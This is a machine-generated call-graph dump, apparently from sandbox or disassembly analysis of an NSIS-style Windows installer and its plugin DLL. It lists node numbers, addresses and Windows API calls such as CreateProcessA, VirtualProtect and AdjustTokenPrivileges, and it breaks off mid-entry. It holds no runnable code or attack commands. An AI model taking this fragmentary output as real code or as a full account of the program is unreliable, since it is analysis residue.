738e2527 lstrcpynA 3775->3776 3776->3773 3776->3774 3776->3775 3777 738e257d wsprintfA 3776->3777 3778 738e25a1 GlobalFree 3776->3778 3779 738e25db GlobalFree 3776->3779 3780 738e1266 2 API calls 3776->3780 3823 738e12d1 3776->3823 3777->3776 3778->3776 3779->3673 3780->3776 3827 738e1215 GlobalAlloc 3782->3827 3784 738e155e 3785 738e156b 2 API calls 3784->3785 3786 738e1568 3785->3786 3787 738e1266 3786->3787 3788 738e126f GlobalAlloc lstrcpynA 3787->3788 3789 738e12a8 GlobalFree 3787->3789 3788->3789 3789->3683 3791 738e157b lstrcpyA 3790->3791 3792 738e1589 3790->3792 3795 738e15c2 3791->3795 3792->3791 3794 738e1595 3792->3794 3794->3795 3796 738e15b2 wsprintfA 3794->3796 3795->3686 3796->3795 3798 738e2470 3797->3798 3800 738e17f3 3797->3800 3799 738e2489 GlobalFree 3798->3799 3798->3800 3799->3798 3800->3693 3800->3694 3802 738e1266 2 API calls 3801->3802 3803 738e1503 3802->3803 3803->3687 3804->3712 3805->3715 3807 738e1552 3806->3807 3807->3715 3814 738e1215 GlobalAlloc 3808->3814 3810 738e1233 lstrcpynA 3810->3723 3811->3741 3812->3739 3813->3723 3814->3810 3816 738e12b4 3815->3816 3817 738e1224 2 API calls 3816->3817 3818 738e12cf 3817->3818 3818->3750 3820 738e266e 3819->3820 3821 738e2618 VirtualAlloc 3819->3821 3820->3749 3821->3820 3822->3776 3824 738e12da 3823->3824 3825 738e12f9 3823->3825 3824->3825 3826 738e12e0 lstrcpyA 3824->3826 3825->3776 3826->3825 3827->3784 5040 402583 5041 402588 5040->5041 5042 40259c 5040->5042 5043 402aa9 17 API calls 5041->5043 5044 402acb 17 API calls 5042->5044 5045 402591 5043->5045 5046 4025a3 lstrlenA 5044->5046 5047 405d14 WriteFile 5045->5047 5048 4025c5 5045->5048 5046->5045 5047->5048 5049 404605 5050 404631 5049->5050 5051 404642 5049->5051 5110 4057d4 GetDlgItemTextA 5050->5110 5052 40464e GetDlgItem 5051->5052 5059 4046ad 5051->5059 5054 404662 5052->5054 5058 404676 SetWindowTextA 5054->5058 5062 405b05 4 API calls 5054->5062 5055 404791 5108 40493b 5055->5108 5112 4057d4 GetDlgItemTextA 5055->5112 5056 40463c 5057 40633e 5 API calls 5056->5057 5057->5051 5063 404173 18 API calls 5058->5063 5059->5055 5064 4060f6 17 API calls 5059->5064 5059->5108 5061 4041da 8 API calls 5066 40494f 5061->5066 5067 40466c 5062->5067 5068 404692 5063->5068 5069 404721 SHBrowseForFolderA 5064->5069 5065 4047c1 5070 405b5a 18 API calls 5065->5070 5067->5058 5074 405a6c 3 API calls 5067->5074 5071 404173 18 API calls 5068->5071 5069->5055 5072 404739 CoTaskMemFree 5069->5072 5073 4047c7 5070->5073 5075 4046a0 5071->5075 5076 405a6c 3 API calls 5072->5076 5113 4060d4 lstrcpynA 5073->5113 5074->5058 5111 4041a8 SendMessageA 5075->5111 5078 404746 5076->5078 5082 40477d SetDlgItemTextA 5078->5082 5085 4060f6 17 API calls 5078->5085 5080 4047de 5084 40646c 5 API calls 5080->5084 5081 4046a6 5083 40646c 5 API calls 5081->5083 5082->5055 5083->5059 5096 4047e5 5084->5096 5086 404765 lstrcmpiA 5085->5086 5086->5082 5088 404776 lstrcatA 5086->5088 5087 404821 5114 4060d4 lstrcpynA 5087->5114 5088->5082 5090 404828 5091 405b05 4 API calls 5090->5091 5092 40482e GetDiskFreeSpaceA 5091->5092 5094 404852 MulDiv 5092->5094 5097 404879 5092->5097 5094->5097 5095 405ab3 2 API calls 5095->5096 5096->5087 5096->5095 5096->5097 5098 4048ea 5097->5098 5100 404a81 20 API calls 5097->5100 5099 40490d 5098->5099 5102 40140b 2 API calls 5098->5102 5115 404195 KiUserCallbackDispatcher 5099->5115 5101 4048d7 5100->5101 5103 4048ec SetDlgItemTextA 5101->5103 5104 4048dc 5101->5104 5102->5099 5103->5098 5106 4049bc 20 API calls 5104->5106 5106->5098 5107 404929 5107->5108 5109 40455e SendMessageA 5107->5109 5108->5061 5109->5108 5110->5056 5111->5081 5112->5065 5113->5080 5114->5090 5115->5107 4306 401c0a 4307 402aa9 17 API calls 4306->4307 4308 401c11 4307->4308 4309 402aa9 17 API calls 4308->4309 4310 401c1e 4309->4310 4311 401c33 4310->4311 4312 402acb 17 API calls 4310->4312 4313 401c43 4311->4313 4314 402acb 17 API calls 4311->4314 4312->4311 4315 401c9a 4313->4315 4316 401c4e 4313->4316 4314->4313 4318 402acb 17 API calls 4315->4318 4317 402aa9 17 API calls 4316->4317 4319 401c53 4317->4319 4320 401c9f 4318->4320 4321 402aa9 17 API calls 4319->4321 4322 402acb 17 API calls 4320->4322 4323 401c5f 4321->4323 4324 401ca8 FindWindowExA 4322->4324 4325 401c8a SendMessageA 4323->4325 4326 401c6c SendMessageTimeoutA 4323->4326 4327 401cc6 4324->4327 4325->4327 4326->4327 5116 401490 5117 4051fb 24 API calls 5116->5117 5118 401497 5117->5118 5119 738e1058 5121 738e1074 5119->5121 5120 738e10dc 5121->5120 5122 738e1091 5121->5122 5123 738e14bb GlobalFree 5121->5123 5124 738e14bb GlobalFree 5122->5124 5123->5122 5125 738e10a1 5124->5125 5126 738e10a8 GlobalSize 5125->5126 5127 738e10b1 5125->5127 5126->5127 5128 738e10b5 GlobalAlloc 5127->5128 5130 738e10c6 5127->5130 5129 738e14e2 3 API calls 5128->5129 5129->5130 5131 738e10d1 GlobalFree 5130->5131 5131->5120 5132 738e15d5 5133 738e14bb GlobalFree 5132->5133 5134 738e15ed 5133->5134 5135 738e1633 GlobalFree 5134->5135 5136 738e1608 5134->5136 5137 738e161f VirtualFree 5134->5137 5136->5135 5137->5135 5138 401d9b GetDC 5139 402aa9 17 API calls 5138->5139 5140 401dad GetDeviceCaps MulDiv ReleaseDC 5139->5140 5141 402aa9 17 API calls 5140->5141 5142 401dde 5141->5142 5143 4060f6 17 API calls 5142->5143 5144 401e1b CreateFontIndirectA 5143->5144 5145 40257d 5144->5145 4547 40159d 4548 402acb 17 API calls 4547->4548 4549 4015a4 SetFileAttributesA 4548->4549 4550 4015b6 4549->4550 5146 40149d 5147 4022e7 5146->5147 5148 4014ab PostQuitMessage 5146->5148 5148->5147 5149 401a1e 5150 402acb 17 API calls 5149->5150 5151 401a27 ExpandEnvironmentStringsA 5150->5151 5152 401a3b 5151->5152 5154 401a4e 5151->5154 5153 401a40 lstrcmpA 5152->5153 5152->5154 5153->5154 4551 40171f 4552 402acb 17 API calls 4551->4552 4553 401726 SearchPathA 4552->4553 4554 401741 4553->4554 4555 403c9f 4556 403df2 4555->4556 4557 403cb7 4555->4557 4559 403e43 4556->4559 4560 403e03 GetDlgItem GetDlgItem 4556->4560 4557->4556 4558 403cc3 4557->4558 4561 403ce1 4558->4561 4562 403cce SetWindowPos 4558->4562 4564 403e9d 4559->4564 4569 401389 2 API calls 4559->4569 4563 404173 18 API calls 4560->4563 4566 403ce6 ShowWindow 4561->4566 4567 403cfe 4561->4567 4562->4561 4568 403e2d SetClassLongA 4563->4568 4565 4041bf SendMessageA 4564->4565 4570 403ded 4564->4570 4596 403eaf 4565->4596 4566->4567 4571 403d20 4567->4571 4572 403d06 DestroyWindow 4567->4572 4573 40140b 2 API calls 4568->4573 4574 403e75 4569->4574 4576 403d25 SetWindowLongA 4571->4576 4577 403d36 4571->4577 4575 4040fc 4572->4575 4573->4559 4574->4564 4578 403e79 SendMessageA 4574->4578 4575->4570 4586 40412d ShowWindow 4575->4586 4576->4570 4581 403d42 GetDlgItem 4577->4581 4582 403ddf 4577->4582 4578->4570 4579 40140b 2 API calls 4579->4596 4580 4040fe DestroyWindow EndDialog 4580->4575 4583 403d72 4581->4583 4584 403d55 SendMessageA IsWindowEnabled 4581->4584 4585 4041da 8 API calls 4582->4585 4588 403d7f 4583->4588 4589 403dc6 SendMessageA 4583->4589 4590 403d92 4583->4590 4600 403d77 4583->4600 4584->4570 4584->4583 4585->4570 4586->4570 4587 4060f6 17 API calls 4587->4596 4588->4589 4588->4600 4589->4582 4593 403d9a 4590->4593 4594 403daf 4590->4594 4591 40414c SendMessageA 4595 403dad 4591->4595 4592 404173 18 API calls 4592->4596 4598 40140b 2 API calls 4593->4598 4597 40140b 2 API calls 4594->4597 4595->4582 4596->4570 4596->4579 4596->4580 4596->4587 4596->4592 4601 404173 18 API calls 4596->4601 4617 40403e DestroyWindow 4596->4617 4599 403db6 4597->4599 4598->4600 4599->4582 4599->4600 4600->4591 4602 403f2a GetDlgItem 4601->4602 4603 403f47 ShowWindow KiUserCallbackDispatcher 4602->4603 4604 403f3f 4602->4604 4626 404195 KiUserCallbackDispatcher 4603->4626 4604->4603 4606 403f71 EnableWindow 4611 403f85 4606->4611 4607 403f8a GetSystemMenu EnableMenuItem SendMessageA 4608 403fba SendMessageA 4607->4608 4607->4611 4608->4611 4610 403c80 18 API calls 4610->4611 4611->4607 4611->4610 4627 4041a8 SendMessageA 4611->4627 4628 4060d4 lstrcpynA 4611->4628 4613 403fe9 lstrlenA 4614 4060f6 17 API calls 4613->4614 4615 403ffa SetWindowTextA 4614->4615 4616 401389 2 API calls 4615->4616 4616->4596 4617->4575 4618 404058 CreateDialogParamA 4617->4618 4618->4575 4619 40408b 4618->4619 4620 404173 18 API calls 4619->4620 4621 404096 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4620->4621 4622 401389 2 API calls 4621->4622 4623 4040dc 4622->4623 4623->4570 4624 4040e4 ShowWindow 4623->4624 4625 4041bf SendMessageA 4624->4625 4625->4575 4626->4606 4627->4611 4628->4613 5160 401d20 5161 402aa9 17 API calls 5160->5161 5162 401d2e SetWindowLongA 5161->5162 5163 402957 5162->5163 3852 403328 SetErrorMode GetVersion 3853 403369 3852->3853 3854 40336f 3852->3854 3855 40646c 5 API calls 3853->3855 3856 4063fe 3 API calls 3854->3856 3855->3854 3857 403385 lstrlenA 3856->3857 3857->3854 3858 403394 3857->3858 3859 40646c 5 API calls 3858->3859 3860 40339b 3859->3860 3861 40646c 5 API calls 3860->3861 3862 4033a2 3861->3862 3863 40646c 5 API calls 3862->3863 3864 4033ae #17 OleInitialize SHGetFileInfoA 3863->3864 3942 4060d4 lstrcpynA 3864->3942 3867 4033fa GetCommandLineA 3943 4060d4 lstrcpynA 3867->3943 3869 40340c 3870 405a97 CharNextA 3869->3870 3871 403435 CharNextA 3870->3871 3879 403445 3871->3879 3872 40350f 3873 403522 GetTempPathA 3872->3873 3944 4032f7 3873->3944 3875 40353a 3876 403594 DeleteFileA 3875->3876 3877 40353e GetWindowsDirectoryA lstrcatA 3875->3877 3954 402db3 GetTickCount GetModuleFileNameA 3876->3954 3880 4032f7 12 API calls 3877->3880 3878 405a97 CharNextA 3878->3879 3879->3872 3879->3878 3884 403511 3879->3884 3883 40355a 3880->3883 3882 4035a8 3885 40363e 3882->3885 3888 40362e 3882->3888 3892 405a97 CharNextA 3882->3892 3883->3876 3887 40355e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3883->3887 4040 4060d4 lstrcpynA 3884->4040 4057 403810 3885->4057 3890 4032f7 12 API calls 3887->3890 3984 403902 3888->3984 3894 40358c 3890->3894 3895 4035c3 3892->3895 3894->3876 3894->3885 3902 403609 3895->3902 3903 40366e 3895->3903 3896 403776 3899 4037f8 ExitProcess 3896->3899 3900 40377e GetCurrentProcess OpenProcessToken 3896->3900 3897 403658 4066 4057f0 3897->4066 3905 4037c9 3900->3905 3906 403799 LookupPrivilegeValueA AdjustTokenPrivileges 3900->3906 4041 405b5a 3902->4041 4070 40575b 3903->4070 3909 40646c 5 API calls 3905->3909 3906->3905 3910 4037d0 3909->3910 3913 4037e5 ExitWindowsEx 3910->3913 3916 4037f1 3910->3916 3913->3899 3913->3916 3914 403684 lstrcatA 3915 40368f lstrcatA lstrcmpiA 3914->3915 3915->3885 3918 4036ab 3915->3918 4090 40140b 3916->4090 3919 4036b0 3918->3919 3920 4036b7 3918->3920 4073 4056c1 CreateDirectoryA 3919->4073 4078 40573e CreateDirectoryA 3920->4078 3922 403623 4056 4060d4 lstrcpynA 3922->4056 3927 4036bc SetCurrentDirectoryA 3928 4036d6 3927->3928 3929 4036cb 3927->3929 4082 4060d4 lstrcpynA 3928->4082 4081 4060d4 lstrcpynA 3929->4081 3932 4060f6 17 API calls 3933 403715 DeleteFileA 3932->3933 3934 403722 CopyFileA 3933->3934 3939 4036e4 3933->3939 3934->3939 3935 40376a 3937 405eb3 36 API calls 3935->3937 3937->3885 3938 4060f6 17 API calls 3938->3939 3939->3932 3939->3935 3939->3938 3941 403756 CloseHandle 3939->3941 4083 405eb3 MoveFileExA 3939->4083 4087 405773 CreateProcessA 3939->4087 3941->3939 3942->3867 3943->3869 3945 40633e 5 API calls 3944->3945 3947 403303 3945->3947 3946 40330d 3946->3875 3947->3946 4093 405a6c lstrlenA CharPrevA 3947->4093 3950 40573e 2 API calls 3951 40331b 3950->3951 3952 405c9c 2 API calls 3951->3952 3953 403326 3952->3953 3953->3875 4096 405c6d GetFileAttributesA CreateFileA 3954->4096 3956 402df6 3983 402e03 3956->3983 4097 4060d4 lstrcpynA 3956->4097 3958 402e19 4098 405ab3 lstrlenA 3958->4098 3962 402e2a GetFileSize 3963 402f2b 3962->3963 3964 402e41 3962->3964 4103 402d14 3963->4103 3964->3963 3968 402fc6 3964->3968 3975 402d14 32 API calls 3964->3975 3964->3983 4134 4032ca 3964->4134 3971 402d14 32 API calls 3968->3971 3969 402f6e GlobalAlloc 3973 402f85 3969->3973 3971->3983 3972 402f4f 3974 4032ca ReadFile 3972->3974 3976 405c9c 2 API calls 3973->3976 3977 402f5a 3974->3977 3975->3964 3978 402f96 CreateFileA 3976->3978 3977->3969 3977->3983 3979 402fd0 3978->3979 3978->3983 4118 4032e0 SetFilePointer 3979->4118 3981 402fde 4119 403059 3981->4119 3983->3882 3985 40646c 5 API calls 3984->3985 3986 403916 3985->3986 3987 40391c 3986->3987 3988 40392e 3986->3988 4177 406032 wsprintfA 3987->4177 3989 405fbb 3 API calls 3988->3989 3990 403959 3989->3990 3992 403977 lstrcatA 3990->3992 3994 405fbb 3 API calls 3990->3994 3993 40392c 3992->3993 4162 403bc7 3993->4162 3994->3992 3997 405b5a 18 API calls 3998 4039a9 3997->3998 3999 403a32 3998->3999 4001 405fbb 3 API calls 3998->4001 4000 405b5a 18 API calls 3999->4000 4002 403a38 4000->4002 4003 4039d5 4001->4003 4004 403a48 LoadImageA 4002->4004 4005 4060f6 17 API calls 4002->4005 4003->3999 4008 4039f1 lstrlenA 4003->4008 4012 405a97 CharNextA 4003->4012 4006 403aee 4004->4006 4007 403a6f RegisterClassA 4004->4007 4005->4004 4011 40140b 2 API calls 4006->4011 4009 403aa5 SystemParametersInfoA CreateWindowExA 4007->4009 4010 403af8 4007->4010 4013 403a25 4008->4013 4014 4039ff lstrcmpiA 4008->4014 4009->4006 4010->3885 4015 403af4 4011->4015 4017 4039ef 4012->4017 4016 405a6c 3 API calls 4013->4016 4014->4013 4018 403a0f GetFileAttributesA 4014->4018 4015->4010 4019 403bc7 18 API calls 4015->4019 4020 403a2b 4016->4020 4017->4008 4021 403a1b 4018->4021 4022 403b05 4019->4022 4178 4060d4 lstrcpynA 4020->4178 4021->4013 4024 405ab3 2 API calls 4021->4024 4025 403b11 ShowWindow 4022->4025 4026 403b94 4022->4026 4024->4013 4028 4063fe 3 API calls 4025->4028 4170 4052cd OleInitialize 4026->4170 4030 403b29 4028->4030 4029 403b9a 4031 403bb6 4029->4031 4032 403b9e 4029->4032 4033 403b37 GetClassInfoA 4030->4033 4035 4063fe 3 API calls 4030->4035 4034 40140b 2 API calls 4031->4034 4032->4010 4038 40140b 2 API calls 4032->4038 4036 403b61 DialogBoxParamA 4033->4036 4037 403b4b GetClassInfoA RegisterClassA 4033->4037 4034->4010 4035->4033 4039 40140b 2 API calls 4036->4039 4037->4036 4038->4010 4039->4010 4040->3873 4190 4060d4 lstrcpynA 4041->4190 4043 405b6b 4191 405b05 CharNextA CharNextA 4043->4191 4045 403614 4045->3885 4055 4060d4 lstrcpynA 4045->4055 4047 40633e 5 API calls 4053 405b81 4047->4053 4048 405bac lstrlenA 4049 405bb7 4048->4049 4048->4053 4051 405a6c 3 API calls 4049->4051 4052 405bbc GetFileAttributesA 4051->4052 4052->4045 4053->4045 4053->4048 4054 405ab3 2 API calls 4053->4054 4197 4063d7 FindFirstFileA 4053->4197 4054->4048 4055->3922 4056->3888 4058 403821 CloseHandle 4057->4058 4059 40382b 4057->4059 4058->4059 4060 403835 CloseHandle 4059->4060 4061 40383f 4059->4061 4060->4061 4200 40386d 4061->4200 4067 405805 4066->4067 4068 403666 ExitProcess 4067->4068 4069 405819 MessageBoxIndirectA 4067->4069 4069->4068 4071 40646c 5 API calls 4070->4071 4072 403673 lstrcatA 4071->4072 4072->3914 4072->3915 4074 405712 GetLastError 4073->4074 4075 4036b5 4073->4075 4074->4075 4076 405721 SetFileSecurityA 4074->4076 4075->3927 4076->4075 4077 405737 GetLastError 4076->4077 4077->4075 4079 405752 GetLastError 4078->4079 4080 40574e 4078->4080 4079->4080 4080->3927 4081->3928 4082->3939 4084 405ed4 4083->4084 4085 405ec7 4083->4085 4084->3939 4258 405d43 4085->4258 4088 4057b2 4087->4088 4089 4057a6 CloseHandle 4087->4089 4088->3939 4089->4088 4091 401389 2 API calls 4090->4091 4092 401420 4091->4092 4092->3899 4094 403315 4093->4094 4095 405a86 lstrcatA 4093->4095 4094->3950 4095->4094 4096->3956 4097->3958 4099 405ac0 4098->4099 4100 402e1f 4099->4100 4101 405ac5 CharPrevA 4099->4101 4102 4060d4 lstrcpynA 4100->4102 4101->4099 4101->4100 4102->3962 4104 402d22 4103->4104 4105 402d3a 4103->4105 4106 402d32 4104->4106 4107 402d2b DestroyWindow 4104->4107 4108 402d42 4105->4108 4109 402d4a GetTickCount 4105->4109 4106->3969 4106->3983 4137 4032e0 SetFilePointer 4106->4137 4107->4106 4138 4064a8 4108->4138 4109->4106 4111 402d58 4109->4111 4112 402d60 4111->4112 4113 402d8d CreateDialogParamA ShowWindow 4111->4113 4112->4106 4142 402cf8 4112->4142 4113->4106 4115 402d6e wsprintfA 4116 4051fb 24 API calls 4115->4116 4117 402d8b 4116->4117 4117->4106 4118->3981 4120 403084 4119->4120 4121 403068 SetFilePointer 4119->4121 4145 403161 GetTickCount 4120->4145 4121->4120 4124 403121 4124->3983 4127 403161 38 API calls 4128 4030bb 4127->4128 4128->4124 4129 403127 ReadFile 4128->4129 4131 4030ca 4128->4131 4129->4124 4131->4124 4132 405ce5 ReadFile 4131->4132 4159 405d14 WriteFile 4131->4159 4132->4131 4135 405ce5 ReadFile 4134->4135 4136 4032dd 4135->4136 4136->3964 4137->3972 4139 4064c5 PeekMessageA 4138->4139 4140 4064d5 4139->4140 4141 4064bb DispatchMessageA 4139->4141 4140->4106 4141->4139 4143 402d07 4142->4143 4144 402d09 MulDiv 4142->4144 4143->4144 4144->4115 4146 4032b9 4145->4146 4147 40318f 4145->4147 4148 402d14 32 API calls 4146->4148 4161 4032e0 SetFilePointer 4147->4161 4150 40308b 4148->4150 4150->4124 4157 405ce5 ReadFile 4150->4157 4151 40319a SetFilePointer 4153 4031bf 4151->4153 4152 4032ca ReadFile 4152->4153 4153->4150 4153->4152 4154 402d14 32 API calls 4153->4154 4155 405d14 WriteFile 4153->4155 4156 40329a SetFilePointer 4153->4156 4154->4153 4155->4153 4156->4146 4158 4030a4 4157->4158 4158->4124 4158->4127 4160 405d32 4159->4160 4160->4131 4161->4151 4163 403bdb 4162->4163 4179 406032 wsprintfA 4163->4179 4165 403c4c 4180 403c80 4165->4180 4167 403987 4167->3997 4168 403c51 4168->4167 4169 4060f6 17 API calls 4168->4169 4169->4168 4183 4041bf 4170->4183 4172 405317 4173 4041bf SendMessageA 4172->4173 4175 405329 OleUninitialize 4173->4175 4174 4052f0 4174->4172 4186 401389 4174->4186 4175->4029 4177->3993 4178->3999 4179->4165 4181 4060f6 17 API calls 4180->4181 4182 403c8e SetWindowTextA 4181->4182 4182->4168 4184 4041d7 4183->4184 4185 4041c8 SendMessageA 4183->4185 4184->4174 4185->4184 4188 401390 4186->4188 4187 4013fe 4187->4174 4188->4187 4189 4013cb MulDiv SendMessageA 4188->4189 4189->4188 4190->4043 4192 405b20 4191->4192 4195 405b30 4191->4195 4194 405b2b CharNextA 4192->4194 4192->4195 4193 405b50 4193->4045 4193->4047 4194->4193 4195->4193 4196 405a97 CharNextA 4195->4196 4196->4195 4198 4063ed FindClose 4197->4198 4199 4063f8 4197->4199 4198->4199 4199->4053 4201 40387b 4200->4201 4202 403844 4201->4202 4203 403880 FreeLibrary GlobalFree 4201->4203 4204 40589c 4202->4204 4203->4202 4203->4203 4205 405b5a 18 API calls 4204->4205 4206 4058bc 4205->4206 4207 4058c4 DeleteFileA 4206->4207 4208 4058db 4206->4208 4209 403647 OleUninitialize 4207->4209 4210 405a13 4208->4210 4245 4060d4 lstrcpynA 4208->4245 4209->3896 4209->3897 4210->4209 4215 4063d7 2 API calls 4210->4215 4212 405901 4213 405914 4212->4213 4214 405907 lstrcatA 4212->4214 4217 405ab3 2 API calls 4213->4217 4216 40591a 4214->4216 4218 405a2d 4215->4218 4219 405928 lstrcatA 4216->4219 4220 40591f 4216->4220 4217->4216 4218->4209 4221 405a31 4218->4221 4222 405933 lstrlenA FindFirstFileA 4219->4222 4220->4219 4220->4222 4223 405a6c 3 API calls 4221->4223 4224 405a09 4222->4224 4243 405957 4222->4243 4225 405a37 4223->4225 4224->4210 4227 405854 5 API calls 4225->4227 4226 405a97 CharNextA 4226->4243 4228 405a43 4227->4228 4229 405a47 4228->4229 4230 405a5d 4228->4230 4229->4209 4235 4051fb 24 API calls 4229->4235 4231 4051fb 24 API calls 4230->4231 4231->4209 4232 4059e8 FindNextFileA 4234 405a00 FindClose 4232->4234 4232->4243 4234->4224 4236 405a54 4235->4236 4237 405eb3 36 API calls 4236->4237 4240 405a5b 4237->4240 4239 40589c 60 API calls 4239->4243 4240->4209 4241 4051fb 24 API calls 4241->4232 4242 4051fb 24 API calls 4242->4243 4243->4226 4243->4232 4243->4239 4243->4241 4243->4242 4244 405eb3 36 API calls 4243->4244 4246 4060d4 lstrcpynA 4243->4246 4247 405854 4243->4247 4244->4243 4245->4212 4246->4243 4255 405c48 GetFileAttributesA 4247->4255 4250 405881 4250->4243 4251 405877 DeleteFileA 4253 40587d 4251->4253 4252 40586f RemoveDirectoryA 4252->4253 4253->4250 4254 40588d SetFileAttributesA 4253->4254 4254->4250 4256 405860 4255->4256 4257 405c5a SetFileAttributesA 4255->4257 4256->4250 4256->4251 4256->4252 4257->4256 4259 405d69 4258->4259 4260 405d8f GetShortPathNameA 4258->4260 4285 405c6d GetFileAttributesA CreateFileA 4259->4285 4262 405da4 4260->4262 4263 405eae 4260->4263 4262->4263 4264 405dac wsprintfA 4262->4264 4263->4084 4266 4060f6 17 API calls 4264->4266 4265 405d73 CloseHandle GetShortPathNameA 4265->4263 4267 405d87 4265->4267 4268 405dd4 4266->4268 4267->4260 4267->4263 4286 405c6d GetFileAttributesA CreateFileA 4268->4286 4270 405de1 4270->4263 4271 405df0 GetFileSize GlobalAlloc 4270->4271 4272 405e12 4271->4272 4273 405ea7 CloseHandle 4271->4273 4274 405ce5 ReadFile 4272->4274 4273->4263 4275 405e1a 4274->4275 4275->4273 4287 405bd2 lstrlenA 4275->4287 4278 405e31 lstrcpyA 4281 405e53 4278->4281 4279 405e45 4280 405bd2 4 API calls 4279->4280 4280->4281 4282 405e8a SetFilePointer 4281->4282 4283 405d14 WriteFile 4282->4283 4284 405ea0 GlobalFree 4283->4284 4284->4273 4285->4265 4286->4270 4288 405c13 lstrlenA 4287->4288 4289 405c1b 4288->4289 4290 405bec lstrcmpiA 4288->4290 4289->4278 4289->4279 4290->4289 4291 405c0a CharNextA 4290->4291 4291->4288 5164 4042a9 lstrcpynA lstrlenA 4338 401e2b 4339 402aa9 17 API calls 4338->4339 4340 401e31 4339->4340 4341 402aa9 17 API calls 4340->4341 4342 401e3d 4341->4342 4343 401e54 EnableWindow 4342->4343 4344 401e49 ShowWindow 4342->4344 4345 402957 4343->4345 4344->4345 4346 738e28e5 4347 738e2935 4346->4347 4348 738e28f5 VirtualProtect 4346->4348 4348->4347 5165 738e10e0 5166 738e110e 5165->5166 5167 738e11c4 GlobalFree 5166->5167 5168 738e12ad 2 API calls 5166->5168 5169 738e11c3 5166->5169 5170 738e11ea GlobalFree 5166->5170 5171 738e1266 2 API calls 5166->5171 5172 738e1155 GlobalAlloc 5166->5172 5173 738e12d1 lstrcpyA 5166->5173 5174 738e11b1 GlobalFree 5166->5174 5168->5166 5169->5167 5170->5166 5171->5174 5172->5166 5173->5166 5174->5166 5175 401f31 5176 402acb 17 API calls 5175->5176 5177 401f38 5176->5177 5178 4063d7 2 API calls 5177->5178 5179 401f3e 5178->5179 5180 401f50 5179->5180 5182 406032 wsprintfA 5179->5182 5182->5180 5183 402932 SendMessageA 5184 402957 5183->5184 5185 40294c InvalidateRect 5183->5185 5185->5184 5186 4014b7 5187 4014bd 5186->5187 5188 401389 2 API calls 5187->5188 5189 4014c5 5188->5189 4447 405339 4448 4054e4 4447->4448 4449 40535b GetDlgItem GetDlgItem GetDlgItem 4447->4449 4451 405514 4448->4451 4452 4054ec GetDlgItem CreateThread CloseHandle 4448->4452 4493 4041a8 SendMessageA 4449->4493 4454 405542 4451->4454 4455 405563 4451->4455 4456 40552a ShowWindow ShowWindow 4451->4456 4452->4451 4516 4052cd 5 API calls 4452->4516 4453 4053cb 4460 4053d2 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4453->4460 4457 40554a 4454->4457 4458 40559d 4454->4458 4502 4041da 4455->4502 4498 4041a8 SendMessageA 4456->4498 4462 405552 4457->4462 4463 405576 ShowWindow 4457->4463 4458->4455 4469 4055aa SendMessageA 4458->4469 4467 405440 4460->4467 4468 405424 SendMessageA SendMessageA 4460->4468 4499 40414c 4462->4499 4465 405596 4463->4465 4466 405588 4463->4466 4471 40414c SendMessageA 4465->4471 4470 4051fb 24 API calls 4466->4470 4472 405453 4467->4472 4473 405445 SendMessageA 4467->4473 4468->4467 4474 4055c3 CreatePopupMenu 4469->4474 4475 40556f 4469->4475 4470->4465 4471->4458 4494 404173 4472->4494 4473->4472 4476 4060f6 17 API calls 4474->4476 4478 4055d3 AppendMenuA 4476->4478 4482 4055f1 GetWindowRect 4478->4482 4483 405604 TrackPopupMenu 4478->4483 4479 405463 4480 4054a0 GetDlgItem SendMessageA 4479->4480 4481 40546c ShowWindow 4479->4481 4480->4475 4487 4054c7 SendMessageA SendMessageA 4480->4487 4484 405482 ShowWindow 4481->4484 4485 40548f 4481->4485 4482->4483 4483->4475 4486 405620 4483->4486 4484->4485 4497 4041a8 SendMessageA 4485->4497 4488 40563f SendMessageA 4486->4488 4487->4475 4488->4488 4489 40565c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4488->4489 4491 40567e SendMessageA 4489->4491 4491->4491 4492 4056a0 GlobalUnlock SetClipboardData CloseClipboard 4491->4492 4492->4475 4493->4453 4495 4060f6 17 API calls 4494->4495 4496 40417e SetDlgItemTextA 4495->4496 4496->4479 4497->4480 4498->4454 4500 404153 4499->4500 4501 404159 SendMessageA 4499->4501 4500->4501 4501->4455 4503 40429d 4502->4503 4504 4041f2 GetWindowLongA 4502->4504 4503->4475 4504->4503 4505 404207 4504->4505 4505->4503 4506 404234 GetSysColor 4505->4506 4507 404237 4505->4507 4506->4507 4508 404247 SetBkMode 4507->4508 4509 40423d SetTextColor 4507->4509 4510 404265 4508->4510 4511 40425f GetSysColor 4508->4511 4509->4508 4512 404276 4510->4512 4513 40426c SetBkColor 4510->4513 4511->4510 4512->4503 4514 404290 CreateBrushIndirect 4512->4514 4515 404289 DeleteObject 4512->4515 4513->4512 4514->4503 4515->4514 5190 4026ba 5191 4026c0 5190->5191 5192 402957 5191->5192 5193 4026c8 FindClose 5191->5193 5193->5192 4517 4015bb 4518 402acb 17 API calls 4517->4518 4519 4015c2 4518->4519 4520 405b05 4 API calls 4519->4520 4532 4015ca 4520->4532 4521 401624 4523 401629 4521->4523 4525 401652 4521->4525 4522 405a97 CharNextA 4522->4532 4524 401423 24 API calls 4523->4524 4527 401630 4524->4527 4526 401423 24 API calls 4525->4526 4533 40164a 4526->4533 4536 4060d4 lstrcpynA 4527->4536 4529 40573e 2 API calls 4529->4532 4530 40575b 5 API calls 4530->4532 4531 40163b SetCurrentDirectoryA 4531->4533 4532->4521 4532->4522 4532->4529 4532->4530 4534 40160c GetFileAttributesA 4532->4534 4535 4056c1 4 API calls 4532->4535 4534->4532 4535->4532 4536->4531 5194 4016bb 5195 402acb 17 API calls 5194->5195 5196 4016c1 GetFullPathNameA 5195->5196 5197 4016f9 5196->5197 5198 4016d8 5196->5198 5199 402957 5197->5199 5200 40170d GetShortPathNameA 5197->5200 5198->5197 5201 4063d7 2 API calls 5198->5201 5200->5199 5202 4016e9 5201->5202 5202->5197 5204 4060d4 lstrcpynA 5202->5204 5204->5197 5205 40273c 5206 402acb 17 API calls 5205->5206 5208 40274a 5206->5208 5207 402760 5210 405c48 2 API calls 5207->5210 5208->5207 5209 402acb 17 API calls 5208->5209 5209->5207 5211 402766 5210->5211 5233 405c6d GetFileAttributesA CreateFileA 5211->5233 5213 402773 5214 40281c 5213->5214 5215 40277f GlobalAlloc 5213->5215 5218 402824 DeleteFileA 5214->5218 5219 402837 5214->5219 5216 402813 CloseHandle 5215->5216 5217 402798 5215->5217 5216->5214 5234 4032e0 SetFilePointer 5217->5234 5218->5219 5221 40279e 5222 